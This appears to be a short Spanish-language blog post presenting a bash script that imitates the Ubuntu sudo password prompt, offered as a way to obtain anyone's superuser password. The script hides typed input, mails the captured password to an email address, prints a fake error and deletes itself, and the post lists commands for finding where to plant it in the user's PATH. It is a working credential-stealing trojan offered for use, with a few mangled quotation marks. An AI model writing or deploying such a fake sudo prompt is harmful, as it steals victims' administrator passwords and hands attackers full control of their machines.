Con un simple script, como es que os voy a poner, podríamos conseguir la clave de superusuario de cualquier persona con Ubuntu en este caso, no voy a explicar como ponerlo pero si el código:
También sería valido para todos esos figuras, que ponen en $PATH su home.
#!/bin/bash
stty -echo #Desactiva el eco
printf "i[sudo] password for ”
printf `who | tail -1 | cut -d ‘ ‘ -f 1`
printf ” :”
read X
echo ” ”
stty echo # Reactiva el eco
echo $1 $X | mail nuestro@correo.com
sleep 1 # Pausa de un segundo
echo Sorry # El mensaje de error hay que cambiarlo por el del sudo
rm “path/del/falso/sudo” # Cumplido el objetivo, se autodestruye el script
Comandos que nos pueden ser de utilidad:
| denos@denos-laptop:~$echo $PATCH |
| denos@denos-laptop:~$whereis sudo |
| denos@denos-laptop:~$locate sudo |
| denos@denos-laptop:~$alias |
Por supuesto para colocar este script tendríamos que estar físicamente delante de la máquina.
Un saludo. Denos.